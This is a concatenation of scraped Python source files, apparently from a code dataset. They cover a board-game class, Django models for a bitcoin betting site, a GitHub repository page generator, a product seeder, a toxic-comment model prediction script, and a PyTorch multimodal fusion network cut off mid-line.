Moves Are In Range\n for coordinate in range(4):\n x_coord = x_move_options[coordinate][0]\n y_coord = x_move_options[coordinate][1]\n\n if x_coord >= 0 and x_coord <= 7:\n if y_coord >= 0 and y_coord <= 7:\n o_checks.append([x_coord, y_coord])\n #print(o_checks)\n elif y_coord <= 0 or y_coord >= 7:\n x_is_done += 1\n\n elif x_coord <= 0 or x_coord >= 7:\n if y_coord <= 0 or y_coord >= 7:\n x_is_done += 1\n #print(\"Out of Bounds:\", x_is_done)\n\n # Sees if the X Move Is To A Space With An O Already\n for coordinate in range(len(o_checks)):\n x_coord2 = o_checks[coordinate][0]\n y_coord2 = o_checks[coordinate][1]\n\n if self._game_board[x_coord2][y_coord2] == \"o\":\n x_is_done += 1\n #print(\"Space is Filled:\", x_is_done)\n\n #print(\"X Out of Options Count\", x_is_done)\n\n # Figures Out if X Can't Move Anywhere Else\n if x_is_done == 4:\n self._game_state = \"O_WON\"\n #print(game_state)\n\n # Otherwise Game Unfinished\n if self._game_state == \"UNFINISHED\":\n return True\n\n def move_x(self, row_x, column_x):\n \"\"\"Moves the X Piece\"\"\"\n\n current_x_pos = self._x_location\n desired_move = [row_x, column_x]\n allowed_moves = []\n\n # Check if Game Has Already Been Won\n if self._game_state == \"X_WON\" or self._game_state == \"O_WON\":\n #print(\"Test: Quitting Now - Game Over\")\n return False\n\n # Check if O is Occupying Space\n if self._game_board[row_x][column_x] == \"o\":\n #print(\"Space is occupied by O\")\n return False\n\n if row_x < 0 or row_x > 7 or column_x < 0 or column_x > 7:\n return False\n\n # Check If Move Is Allowed and Make Move If It Is\n else:\n #Generate Allowed Moves\n # Add 1 to Both\n move_option = [x + 1 for x in current_x_pos]\n allowed_moves.append(move_option)\n\n # Subtract 1 from Both\n move_option = [x -1 for x in current_x_pos]\n allowed_moves.append(move_option)\n\n # +1 / - 1\n move_option2 = []\n move_option2.append(current_x_pos[0] + 1)\n move_option2.append(current_x_pos[1] - 1)\n allowed_moves.append(move_option2)\n\n # - 1 / + 1\n move_option3 = []\n move_option3.append(current_x_pos[0] - 1)\n move_option3.append(current_x_pos[1] + 1)\n allowed_moves.append(move_option3)\n #print(\"Allowed Moves:\", allowed_moves)\n\n # Check if Desired Move in Allowed Moves\n #print(\"Desired Move:\", desired_move)\n if desired_move in allowed_moves:\n #print(\"Move is Allowed\")\n\n # Clear Previous X Position\n self._game_board[self._x_location[0]][self._x_location[1]] = \" \"\n\n # Make Move\n self._game_board[row_x][column_x] = \"x\"\n\n # Update Current X Position\n current_x_pos = [row_x, column_x]\n self._x_location = current_x_pos\n #print(\"New X Position Is:\", current_x_pos)\n #print(\"self._x_location is now\", self._x_location)\n #print(self._game_board)\n\n # Clear Allowed Moves\n allowed_moves.clear()\n\n # Check for Win\n self.win_check()\n return True\n\n else:\n #print(\"Move is Not Allowed\")\n return False\n\n def move_o(self, row1_o, column1_o, row2_o, column2_o):\n \"\"\"Moves the O Piece\"\"\"\n\n stated_current_o = [row1_o, column1_o]\n desired_o_location = [row2_o, column2_o]\n allowed_o_moves = []\n\n # Check if Game Already Won\n if self._game_state == \"X_WON\" or self._game_state == \"O_WON\":\n #print(\"Test: Quitting Now - Game Over\")\n return False\n\n if row2_o < 0 or row2_o > 7 or column2_o < 0 or column2_o > 7:\n return False\n\n # Check to make sure there's an O to move\n if self._game_board[row1_o][column1_o] != \"o\":\n #print(\"Test: Not an O there to move\")\n return False\n\n # Check if Desired Space to Move is Occupied\n if self._game_board[row2_o][column2_o] == \"o\" or self._game_board[row2_o][column2_o] == \"x\":\n #print(\"Space is occupied already by an X or O\")\n return False\n\n # Check if Move is Allowed and Make Move If it Is\n else:\n # Generate Allowed Moves for O\n # Subtract 1 from Both\n move_option_o = [x - 1 for x in stated_current_o]\n allowed_o_moves.append(move_option_o)\n #print(allowed_o_moves)\n\n # +1 / - 1\n move_option_o2 = []\n move_option_o2.append(stated_current_o[0] + 1)\n move_option_o2.append(stated_current_o[1] - 1)\n allowed_o_moves.append(move_option_o2)\n #print(allowed_o_moves)\n\n # - 1 / + 1\n move_option_o3 = []\n move_option_o3.append(stated_current_o[0] - 1)\n move_option_o3.append(stated_current_o[1] + 1)\n allowed_o_moves.append(move_option_o3)\n #print(\"Allowed Moves:\", allowed_o_moves)\n\n # Check if Desired Move in Allowed Moves\n #print(\"Desired Move:\", desired_o_location)\n if desired_o_location in allowed_o_moves:\n #print(\"Move is Allowed\")\n\n # Clear Previous 0 Position\n self._game_board[stated_current_o[0]][stated_current_o[1]] = \" \"\n\n # Make Move\n self._game_board[row2_o][column2_o] = \"o\"\n #print(self._game_board)\n\n # Clear Allowed Moves\n allowed_o_moves.clear()\n #print(allowed_o_moves)\n\n # Check for Win\n self.win_check()\n return True\n\n def get_game_state(self):\n \"\"\"Returns the current state of the game: UNFINISHED, X_WON, or O_WON\"\"\"\n return self._game_state","sub_path":"FBoard.py","file_name":"FBoard.py","file_ext":"py","file_size_in_byte":8563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"576218399","text":"from django.db import models\nfrom django.conf import settings\nfrom django.contrib.auth.models import User\nimport datetime\nfrom django.utils import timezone\n\n# Create your models here.\n\n\n# User model from django \n\nclass Category(models.Model):\n cat = models.CharField(max_length=100)\n def __str__(self):\n return self.cat\n\nclass Match(models.Model):\n match = models.CharField(max_length=200)\n cat = models.ForeignKey(Category)\n match_date=models.DateTimeField(verbose_name='match date/time',auto_now_add=True)\n finished=models.NullBooleanField(default=False)#true=yes, false=no\n def __str__(self):\n return self.match\n\nclass Image(models.Model):\n image=models.ImageField(upload_to='static',null=True)#upload to?\n match=models.ForeignKey(Match)\n\nclass Offer(models.Model):\n offer = models.CharField(max_length=200)\n match= models.ForeignKey(Match,null=True)\n post_date = models.DateTimeField('date posted',auto_now_add=True)#,auto_now_add=True)\n odds = models.FloatField(null=True, blank=True,verbose_name=\"odds\")\n result=models.NullBooleanField()#true=win, false=loss, unknown\n def __str__(self):\n return self.offer\n\nclass Bet(models.Model):\n user = models.ForeignKey(User)\n offer= models.ForeignKey(Offer)\n amt = models.FloatField(null=True, blank=True,verbose_name=\"bet amount mBtC\")\n submitted=models.NullBooleanField()#true=submitted, false=still open\n parlay=models.NullBooleanField(default=False)#true=win, false=loss\n paid=models.NullBooleanField(default=False)\n\nclass Parlay(models.Model):\n user = models.ForeignKey(User)\n amt = models.FloatField(null=True, blank=True,verbose_name=\"Parlay amount mBtC\")\n bet_list = models.CommaSeparatedIntegerField(max_length=250)\n paid=models.NullBooleanField(default=False)\n #do i need submitted?","sub_path":"myapp/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"352757274","text":"#!/usr/bin/python\n# coding: utf-8 -*-\n\n#\n# GNU General Public License v3.0+\n#\n# Copyright 2020 TiTom73\n#\n# Licensed under the Apache License, Version 2.0 (the 'License');\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http: //www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an 'AS IS' BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nimport os\nimport sys\nimport requests\nfrom jinja2 import Environment, FileSystemLoader\n\nGH_API_ENDPOINT = 'https://api.github.com/users/aristanetworks/repos?per_page=100'\nJSON_FIELDS = { 'name':'project_name', 'description':'description', 'html_url':'homepage', 'updated_at': 'last_commit'}\nTEMPLATE_MARKDOWN = 'page.md.j2'\nOUTPUT_FILE = '../docs/arista.md'\nPAGE_TITLE= 'Arista Networks'\nORGANISATION_NAME = 'aristanetworks'\nORGANISATION_URL = 'https://github.com/' + ORGANISATION_NAME\n\ndef get_gh_api(url):\n \"\"\"\n get_gh_api Extract information using GET\n\n Collect Github data from their public API\n Current version does not support authentication\n\n Parameters\n ----------\n url : string\n Github API string to get.\n\n Returns\n -------\n json\n Response from GH.\n \"\"\"\n response = requests.get(url)\n if response.status_code == requests.codes.ok:\n return response.json()\n return {}\n\ndef extract_fields(gh_json, fields):\n \"\"\"\n extract_fields Extract field from GH API data\n\n Extract fields from GH API data and standardize name of keys\n\n Parameters\n ----------\n gh_json : json\n JSON content from Github\n fields : dict\n A list of fields to extract and the name we want to use as standard.\n \"\"\"\n data = list()\n for entry in gh_json:\n cell = dict()\n for field in fields:\n cell[fields[field]] = entry[field]\n data.append(cell)\n return data\n\n\nif __name__ == '__main__':\n data = get_gh_api(url=GH_API_ENDPOINT)\n projects = extract_fields(gh_json=data, fields=JSON_FIELDS)\n root = os.path.dirname(os.path.abspath(__file__))\n env = Environment( loader = FileSystemLoader(root) )\n env.trim_blocks = True\n env.lstrip_blocks = True\n env.rstrip_blocks = True\n template = env.get_template(TEMPLATE_MARKDOWN)\n output = template.render(projects=projects, organisation_name=ORGANISATION_NAME, organisation_url=ORGANISATION_URL, page_title=PAGE_TITLE)\n filename = os.path.join(root, OUTPUT_FILE)\n with open(filename, 'w') as fh:\n fh.write(output)\n\n sys.exit(0)\n","sub_path":".github/aristanetworks.py","file_name":"aristanetworks.py","file_ext":"py","file_size_in_byte":2773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"45089017","text":"#!/usr/bin/env python3\n\nprint('Product.destroy_all\\n\\nProduct.create!([')\nwith open('ProductList.csv', 'r') as infile:\n first = True\n output = ''\n for line in infile:\n if first:\n if line[0] == '\\ufeff': # Mac Excel weirdness\n line = line[1:]\n else:\n print('},')\n first = False\n\n fields = line.split(',')\n name = fields[0].strip('$')\n price = float(fields[1].strip('$'))\n cogs = price * 0.65 * 0.45 # 45% discount leaves 55% gross margin\n lb = '{'\n print(f'{lb}\\n name:\"{name}\",')\n print(f' price:{price:.2f},')\n print(f' cogs:{cogs:.2f}')\n print('}])')\n\n\n\n","sub_path":"productSeeder.py","file_name":"productSeeder.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"236012396","text":"\"\"\"\n模型预测脚本\n\"\"\"\nfrom os.path import join, exists\nfrom json import dumps, loads\nfrom time import time\n\nimport torch\nimport numpy as np\nimport pandas as pd\nfrom sklearn.metrics import roc_auc_score\n\nfrom allennlp.commands.predict import _PredictManager\nfrom allennlp.data.token_indexers import SingleIdTokenIndexer\n\nfrom library.modules import components\nfrom library.models.bigru import BiGRU\n\ndef test_to_json( in_file, out_file ):\n \"\"\"\n 将处理后的测试集转成json格式,便于Predictor使用\n \"\"\"\n json_lines = []\n with open( in_file, 'r' ) as f:\n for i, line in enumerate( f ) :\n if i == 0:\n continue\n test_id, tokens = line.strip( \"\\n\" ).split( ',' )\n d = {\"test_id\": test_id, \"tokens\": tokens}\n json_lines.append( dumps( d ) + \"\\n\" )\n with open( out_file, 'w' ) as g:\n g.writelines( json_lines )\n\ndef combine_json_to_submission( json_results, sample_submission, submission_file ):\n \"\"\"\n 将k-fold CV模型在测试集上的结果简单平均,得到最终提交结果\n \"\"\"\n results = {}\n for json_result in json_results:\n with open( json_result, \"r\" ) as f:\n for line in f:\n d = loads( line.strip( \"\\n\" ) )\n k = d[\"test_id\"]; v = np.array( d[\"probs\"] )\n results[k] = results.get( k, 0 ) + v\n\n output_lines = []\n num_results = len( json_results )\n with open( sample_submission, \"r\" ) as f:\n for i, line in enumerate( f ):\n if i == 0:\n output_lines.append( line )\n continue\n test_id = line.strip( \"\\n\" ).split( \",\" )[0]\n scores = \",\".join( [\"%f\" % ( s / num_results ) for s in results[test_id]] )\n output_lines.append( test_id + \",\" + scores + \"\\n\" )\n \n with open( submission_file, \"w\" ) as f:\n f.writelines( output_lines )\n\ndef get_score( pred_file, true_file ):\n \"\"\"\n 由于比赛结束后公布了完整测试集上的标签,因此不通过提交也能得出分数(因为提交次数有限制)\n 但是由于public与private LB混在一起且具体划分未知,所以与kaggle网站上的分数比较没有参考价值,仅限于离线比较\n \"\"\"\n pred = pd.read_csv( pred_file ).values[:,1:].astype( np.float64 )\n true = pd.read_csv( true_file ).values[:,1:].astype( np.int8 )\n scored_index = true[:,0] != -1\n pred_scored = pred[scored_index,:]\n true_scored = true[scored_index,:]\n score = roc_auc_score( true_scored, pred_scored )\n return score\n\nif __name__ == \"__main__\":\n\n begin = time()\n base_dir = \"/home/ubuntu/MyFiles/nlp_data/toxic\"\n submission_dir = join( base_dir, \"submission\" )\n checkpoint_dir = \"/home/ubuntu/MyFiles/toxic_comment/checkpoint\"\n input_file = join( submission_dir, \"test_clean.jsonl\" )\n\n vocab_dir = join( checkpoint_dir, \"vocabulary\" )\n vocab = components.create_or_load_vocab( vocab_dir, None ) # 强制从ckpt中载入字典\n\n embedding_matrix_file = join( base_dir, \"exp\", \"embedding_matrix.npy\" )\n np_data = np.load( embedding_matrix_file )\n embedding_matrix = torch.from_numpy( np_data )\n model = BiGRU( vocab = vocab, embedding_matrix = embedding_matrix )\n\n reader = components.ToxicDatasetReader()\n\n cuda_device = 0 if torch.cuda.is_available() else -1\n\n num_fold = 10\n for i in range( num_fold ):\n # load model and put it on device\n model_checkpoint = join( checkpoint_dir, \"%d/model.th\" % i )\n with open( model_checkpoint, \"rb\" ) as f:\n model.load_state_dict( torch.load( f ) )\n if cuda_device > -1:\n model.cuda( cuda_device )\n \n # construct predictor and manager\n output_file = join( submission_dir, \"%d.jsonl\" % i )\n predictor = components.ToxicPredictor( model, reader )\n manager = _PredictManager( \n predictor = predictor, \n input_file = input_file,\n output_file = output_file,\n batch_size = 32,\n print_to_console = False,\n has_dataset_reader = False \n )\n # predict and write into files\n manager.run()\n\n json_results = [join( submission_dir, \"%d.jsonl\" % i ) for i in range( num_fold )]\n sample_submission = join( submission_dir, \"sample_submission.csv\" )\n submission_file = join( submission_dir, \"submission.csv\" )\n combine_json_to_submission( json_results, sample_submission, submission_file )\n\n true_file = join( submission_dir, \"test_labels.csv\" )\n score = get_score( submission_file, true_file )\n\n consume = ( time() - begin ) / 60 # 大约消耗30min\n print( \"AUC: %f, predict consumes %.2f min\" % ( score, consume ) )\n","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":4748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"571994042","text":"import numpy as np\nseed = 123\nnp.random.seed(seed)\nimport random\nimport torch\ntorch.manual_seed(seed)\ntorch.cuda.manual_seed(seed)\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.autograd import Variable, grad\nfrom torch.optim.lr_scheduler import ReduceLROnPlateau\n\nimport h5py\nimport time\nimport argparse\nimport time\nimport json, os, h5py\n\nfrom keras.models import Model\nfrom keras.layers import Input\nfrom keras.layers.embeddings import Embedding\n\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import precision_recall_fscore_support\nfrom sklearn.metrics import accuracy_score, f1_score\n\nimport sys\n\n\nclass MFN(nn.Module):\n\tdef __init__(self,d_l, d_a, d_v, h_l, h_a, h_v, memsize, windowsize, h_att1, h_att2, h_gamma1, h_gamma2, h_out, d_fusion, beta, M=3):\n\t\tsuper(MFN, self).__init__()\n\t\t[self.d_l,self.d_a,self.d_v] = [d_l, d_a, d_v]\n\t\t[self.dh_l,self.dh_a,self.dh_v] = [h_l, h_a, h_v]\n\t\ttotal_h_dim = self.dh_l+self.dh_a+self.dh_v\n\t\tself.mem_dim = memsize\n\t\twindow_dim = windowsize\n\t\toutput_dim = 1\n\t\tattInShape = total_h_dim*window_dim\n\t\tgammaInShape = attInShape+self.mem_dim\n\t\tself.d_fusion = d_fusion\n\t\tfinal_out = self.d_fusion+self.mem_dim\n\t\tatt1_dropout = 0\n\t\tatt2_dropout = 0\n\t\tgamma1_dropout = 0\n\t\tgamma2_dropout = 0\n\t\tout_dropout = 0\n\n\t\tself.lstm_l = nn.LSTMCell(self.d_l, self.dh_l)\n\t\tself.lstm_a = nn.LSTMCell(self.d_a, self.dh_a)\n\t\tself.lstm_v = nn.LSTMCell(self.d_v, self.dh_v)\n\n\t\tself.att1_fc1 = nn.Linear(attInShape, h_att1)\n\t\tself.att1_fc2 = nn.Linear(h_att1, attInShape)\n\t\tself.att1_dropout = nn.Dropout(att1_dropout)\n\n\t\tself.att2_fc1 = nn.Linear(attInShape, h_att2)\n\t\tself.att2_fc2 = nn.Linear(h_att2, self.mem_dim)\n\t\tself.att2_dropout = nn.Dropout(att2_dropout)\n\n\t\tself.gamma1_fc1 = nn.Linear(gammaInShape, h_gamma1)\n\t\tself.gamma1_fc2 = nn.Linear(h_gamma1, self.mem_dim)\n\t\tself.gamma1_dropout = nn.Dropout(gamma1_dropout)\n\n\t\tself.gamma2_fc1 = nn.Linear(gammaInShape, h_gamma2)\n\t\tself.gamma2_fc2 = nn.Linear(h_gamma2, self.mem_dim)\n\t\tself.gamma2_dropout = nn.Dropout(gamma2_dropout)\n \n\t\tself.fusion_l = nn.Linear(self.dh_l, self.d_fusion)\n\t\tself.fusion_a = nn.Linear(self.dh_a, self.d_fusion)\n\t\tself.fusion_v = nn.Linear(self.dh_v, self.d_fusion)\t\t\n\n\t\tself.out_fc1 = nn.Linear(final_out, h_out)\n\t\tself.out_fc2 = nn.Linear(h_out, output_dim)\n\t\tself.out_dropout = nn.Dropout(out_dropout)\n\t\tself.beta = beta\n\t\tself.M = M\n\tdef forward(self,x):\n\t\tx_l = x[:,:,:self.d_l]\n\t\tx_a = x[:,:,self.d_l:self.d_l+self.d_a]\n\t\tx_v = x[:,:,self.d_l+self.d_a:]\n\t\t# x is t x n x d\n\t\tn = x.shape[1]\n\t\tt = x.shape[0]\n\t\tself.h_l = torch.zeros(n, self.dh_l).cuda()\n\t\tself.h_a = torch.zeros(n, self.dh_a).cuda()\n\t\tself.h_v = torch.zeros(n, self.dh_v).cuda()\n\t\tself.c_l = torch.zeros(n, self.dh_l).cuda()\n\t\tself.c_a = torch.zeros(n, self.dh_a).cuda()\n\t\tself.c_v = torch.zeros(n, self.dh_v).cuda()\n\t\tself.mem = torch.zeros(n, self.mem_dim).cuda()\n\t\tall_h_ls = []\n\t\tall_h_as = []\n\t\tall_h_vs = []\n\t\tall_c_ls = []\n\t\tall_c_as = []\n\t\tall_c_vs = []\n\t\tall_mems = []\n\t\tfor i in range(t):\n\t\t\t# prev time step\n\t\t\tprev_c_l = self.c_l\n\t\t\tprev_c_a = self.c_a\n\t\t\tprev_c_v = self.c_v\n\t\t\t# curr time step\n\t\t\tnew_h_l, new_c_l = self.lstm_l(x_l[i], (self.h_l, self.c_l))\n\t\t\tnew_h_a, new_c_a = self.lstm_a(x_a[i], (self.h_a, self.c_a))\n\t\t\tnew_h_v, new_c_v = self.lstm_v(x_v[i], (self.h_v, self.c_v))\n\t\t\t# concatenate\n\t\t\tprev_cs = torch.cat([prev_c_l,prev_c_a,prev_c_v], dim=1)\n\t\t\tnew_cs = torch.cat([new_c_l,new_c_a,new_c_v], dim=1)\n\t\t\tcStar = torch.cat([prev_cs,new_cs], dim=1)\n\t\t\tattention = F.softmax(self.att1_fc2(self.att1_dropout(F.relu(self.att1_fc1(cStar)))),dim=1)\n\t\t\tattended = attention*cStar\n\t\t\tcHat = F.tanh(self.att2_fc2(self.att2_dropout(F.relu(self.att2_fc1(attended)))))\n\t\t\tboth = torch.cat([attended,self.mem], dim=1)\n\t\t\tgamma1 = F.sigmoid(self.gamma1_fc2(self.gamma1_dropout(F.relu(self.gamma1_fc1(both)))))\n\t\t\tgamma2 = F.sigmoid(self.gamma2_fc2(self.gamma2_dropout(F.relu(self.gamma2_fc1(both)))))\n\t\t\tself.mem = gamma1*self.mem + gamma2*cHat\n\t\t\tall_mems.append(self.mem)\n\t\t\t# update\n\t\t\tself.h_l, self.c_l = new_h_l, new_c_l\n\t\t\tself.h_a, self.c_a = new_h_a, new_c_a\n\t\t\tself.h_v, self.c_v = new_h_v, new_c_v\n\t\t\tall_h_ls.append(self.h_l)\n\t\t\tall_h_as.append(self.h_a)\n\t\t\tall_h_vs.append(self.h_v)\n\t\t\tall_c_ls.append(self.c_l)\n\t\t\tall_c_as.append(self.c_a)\n\t\t\tall_c_vs.append(self.c_v)\n\n\t\t# last hidden layer last_hs is n x h\n\t\tlast_h_l = all_h_ls[-1]\n\t\tlast_h_a = all_h_as[-1]\n\t\tlast_h_v = all_h_vs[-1]\n\t\tlast_mem = all_mems[-1]\n \n\t\tlast_hf_l = self.fusion_l(last_h_l)\n\t\tlast_hf_a = self.fusion_a(last_h_a)\n\t\tlast_hf_v = self.fusion_v(last_h_v)\n\t\tp_h_l = self.compute_exp(last_hf_l)\n\t\tp_h_a = self.compute_exp(last_hf_a)\n\t\tp_h_v = self.compute_exp(last_hf_v)\n\t\tlast_hf_lav = torch.pow(p_h_l, self.beta/(self.M-1)) * torch.log(p_h_l) + torch.pow(p_h_a, self.beta/(self.M-1)) * torch.log(p_h_a) + torch.pow(p_h_v, self.beta/(self.M-1)) * torch.log(p_h_v)\n\t\tlast_hs = torch.cat([last_hf_lav,last_mem], dim=1)\n\t\toutput = self.out_fc2(self.out_dropout(F.relu(self.out_fc1(last_hs))))\n\t\treturn output\n\t\n\tdef compute_exp(self, logits):\n\t\tlogits_max = torch.max(logits)\n\t\toff_logits = logits - logits_max\n\t\tp = torch.exp(off_logits)\n\t\treturn p\n\n\"\"\"\ndef train_mfn(X_train, y_train, X_valid, y_valid, X_test, y_test, configs):\n\tp = np.random.permutation(X_train.shape[0])\n\tX_train = X_train[p]\n\ty_train = y_train[p]\n\n\tX_train = X_train.swapaxes(0,1)\n\tX_valid = X_valid.swapaxes(0,1)\n\tX_test = X_test.swapaxes(0,1)\n\n\td = X_train.shape[2]\n\th = 128\n\tt = X_train.shape[0]\n\toutput_dim = 1\n\tdropout = 0.5\n\n\t[config,NN1Config,NN2Config,gamma1Config,gamma2Config,outConfig] = configs\n\n\tmodel = MFN(config,NN1Config,NN2Config,gamma1Config,gamma2Config,outConfig)\n\n\toptimizer = optim.Adam(model.parameters(),lr=config[\"lr\"])\n\n\tcriterion = nn.L1Loss()\n\tdevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\tmodel = model.to(device)\n\tcriterion = criterion.to(device)\n\tscheduler = ReduceLROnPlateau(optimizer,mode='min',patience=100,factor=0.5,verbose=True)\n\n\tdef train(model, batchsize, X_train, y_train, optimizer, criterion):\n\t\tepoch_loss = 0\n\t\tmodel.train()\n\t\ttotal_n = X_train.shape[1]\n\t\tnum_batches = total_n / batchsize\n\t\tfor batch in xrange(num_batches):\n\t\t\tstart = batch*batchsize\n\t\t\tend = (batch+1)*batchsize\n\t\t\toptimizer.zero_grad()\n\t\t\tbatch_X = torch.Tensor(X_train[:,start:end]).cuda()\n\t\t\tbatch_y = torch.Tensor(y_train[start:end]).cuda()\n\t\t\tpredictions = model.forward(batch_X).squeeze(1)\n\t\t\tloss = criterion(predictions, batch_y)\n\t\t\tloss.backward()\n\t\t\toptimizer.step()\n\t\t\tepoch_loss += loss.item()\n\t\treturn epoch_loss / num_batches\n\n\tdef evaluate(model, X_valid, y_valid, criterion):\n\t\tepoch_loss = 0\n\t\tmodel.eval()\n\t\twith torch.no_grad():\n\t\t\tbatch_X = torch.Tensor(X_valid).cuda()\n\t\t\tbatch_y = torch.Tensor(y_valid).cuda()\n\t\t\tpredictions = model.forward(batch_X).squeeze(1)\n\t\t\tepoch_loss = criterion(predictions, batch_y).item()\n\t\treturn epoch_loss\n\n\tdef predict(model, X_test):\n\t\tepoch_loss = 0\n\t\tmodel.eval()\n\t\twith torch.no_grad():\n\t\t\tbatch_X = torch.Tensor(X_test).cuda()\n\t\t\tpredictions = model.forward(batch_X).squeeze(1)\n\t\t\tpredictions = predictions.cpu().data.numpy()\n\t\treturn predictions\n\n\tbest_valid = 999999.0\n\trand = random.randint(0,100000)\n\tfor epoch in range(config[\"num_epochs\"]):\n\t\ttrain_loss = train(model, config[\"batchsize\"], X_train, y_train, optimizer, criterion)\n\t\tvalid_loss = evaluate(model, X_valid, y_valid, criterion)\n\t\tscheduler.step(valid_loss)\n\t\tif valid_loss <= best_valid:\n\t\t\t# save model\n\t\t\tbest_valid = valid_loss\n\t\t\tprint epoch, train_loss, valid_loss, 'saving model'\n\t\t\ttorch.save(model, 'temp_models/mfn_%d.pt' %rand)\n\t\telse:\n\t\t\tprint epoch, train_loss, valid_loss\n\n\tprint 'model number is:', rand\n\tmodel = torch.load('temp_models/mfn_%d.pt' %rand)\n\n\tpredictions = predict(model, X_test)\n\tmae = np.mean(np.absolute(predictions-y_test))\n\tprint \"mae: \", mae\n\tcorr = np.corrcoef(predictions,y_test)[0][1]\n\tprint \"corr: \", corr\n\tmult = round(sum(np.round(predictions)==np.round(y_test))/float(len(y_test)),5)\n\tprint \"mult_acc: \", mult\n\tf_score = round(f1_score(np.round(predictions),np.round(y_test),average='weighted'),5)\n\tprint \"mult f_score: \", f_score\n\ttrue_label = (y_test >= 0)\n\tpredicted_label = (predictions >= 0)\n\tprint \"Confusion Matrix :\"\n\tprint confusion_matrix(true_label, predicted_label)\n\tprint \"Classification Report :\"\n\tprint classification_report(true_label, predicted_label, digits=5)\n\tprint \"Accuracy \", accuracy_score(true_label, predicted_label)\n\tsys.stdout.flush()\n\n\ndef test(X_test, y_test, metric):\n\tX_test = X_test.swapaxes(0,1)\n\tdef predict(model, X_test):\n\t\tepoch_loss = 0\n\t\tmodel.eval()\n\t\twith torch.no_grad():\n\t\t\tbatch_X = torch.Tensor(X_test).cuda()\n\t\t\tpredictions = model.forward(batch_X).squeeze(1)\n\t\t\tpredictions = predictions.cpu().data.numpy()\n\t\treturn predictions\n\tif metric == 'mae':\n\t\tmodel = torch.load('best/mfn_mae.pt')\n\tif metric == 'acc':\n\t\tmodel = torch.load('best/mfn_acc.pt')\n\tmodel = model.cpu().cuda()\n\t\n\tpredictions = predict(model, X_test)\n\tprint predictions.shape\n\tprint y_test.shape\n\tmae = np.mean(np.absolute(predictions-y_test))\n\tprint \"mae: \", mae\n\tcorr = np.corrcoef(predictions,y_test)[0][1]\n\tprint \"corr: \", corr\n\tmult = round(sum(np.round(predictions)==np.round(y_test))/float(len(y_test)),5)\n\tprint \"mult_acc: \", mult\n\tf_score = round(f1_score(np.round(predictions),np.round(y_test),average='weighted'),5)\n\tprint \"mult f_score: \", f_score\n\ttrue_label = (y_test >= 0)\n\tpredicted_label = (predictions >= 0)\n\tprint \"Confusion Matrix :\"\n\tprint confusion_matrix(true_label, predicted_label)\n\tprint \"Classification Report :\"\n\tprint classification_report(true_label, predicted_label, digits=5)\n\tprint \"Accuracy \", accuracy_score(true_label, predicted_label)\n\tsys.stdout.flush()\n\nlocal = False\n\nif local:\n\tX_train, y_train, X_valid, y_valid, X_test, y_test = get_data(args,config)\n\n\th5f = h5py.File('data/X_train.h5', 'w')\n\th5f.create_dataset('data', data=X_train)\n\th5f = h5py.File('data/y_train.h5', 'w')\n\th5f.create_dataset('data', data=y_train)\n\th5f = h5py.File('data/X_valid.h5', 'w')\n\th5f.create_dataset('data', data=X_valid)\n\th5f = h5py.File('data/y_valid.h5', 'w')\n\th5f.create_dataset('data', data=y_valid)\n\th5f = h5py.File('data/X_test.h5', 'w')\n\th5f.create_dataset('data', data=X_test)\n\th5f = h5py.File('data/y_test.h5', 'w')\n\th5f.create_dataset('data', data=y_test)\n\n\tsys.stdout.flush()\n\nX_train, y_train, X_valid, y_valid, X_test, y_test = load_saved_data()\n\ntest(X_test, y_test, 'mae')\ntest(X_test, y_test, 'acc')\nassert False\n\n#config = dict()\n#config[\"batchsize\"] = 32\n#config[\"num_epochs\"] = 100\n#config[\"lr\"] = 0.01\n#config[\"h\"] = 128\n#config[\"drop\"] = 0.5\n#train_ef(X_train, y_train, X_valid, y_valid, X_test, y_test, config)\n#assert False\n\nwhile True:\n\t# mae 0.993 [{'input_dims': [300, 5, 20], 'batchsize': 128, 'memsize': 128, \n\t#'windowsize': 2, 'lr': 0.01, 'num_epochs': 100, 'h_dims': [88, 48, 16], 'momentum': 0.9}, \n\t#{'shapes': 128, 'drop': 0.0}, {'shapes': 64, 'drop': 0.2}, \n\t#{'shapes': 256, 'drop': 0.0}, {'shapes': 64, 'drop': 0.2}, \n\t#{'shapes': 64, 'drop': 0.5}]\n\n\t# acc 77.0 [{'input_dims': [300, 5, 20], 'batchsize': 128, 'memsize': 400, \n\t#'windowsize': 2, 'lr': 0.005, 'num_epochs': 100, 'h_dims': [64, 8, 80], 'momentum': 0.9}, \n\t#{'shapes': 128, 'drop': 0.5}, {'shapes': 128, 'drop': 0.2}, \n\t#{'shapes': 128, 'drop': 0.5}, {'shapes': 128, 'drop': 0.5}, \n\t#{'shapes': 256, 'drop': 0.5}]\n\n\tconfig = dict()\n\tconfig[\"input_dims\"] = [300,5,20]\n\thl = random.choice([32,64,88,128,156,256])\n\tha = random.choice([8,16,32,48,64,80])\n\thv = random.choice([8,16,32,48,64,80])\n\tconfig[\"h_dims\"] = [hl,ha,hv]\n\tconfig[\"memsize\"] = random.choice([64,128,256,300,400])\n\tconfig[\"windowsize\"] = 2\n\tconfig[\"batchsize\"] = random.choice([32,64,128,256])\n\tconfig[\"num_epochs\"] = 50\n\tconfig[\"lr\"] = random.choice([0.001,0.002,0.005,0.008,0.01])\n\tconfig[\"momentum\"] = random.choice([0.1,0.3,0.5,0.6,0.8,0.9])\n\tNN1Config = dict()\n\tNN1Config[\"shapes\"] = random.choice([32,64,128,256])\n\tNN1Config[\"drop\"] = 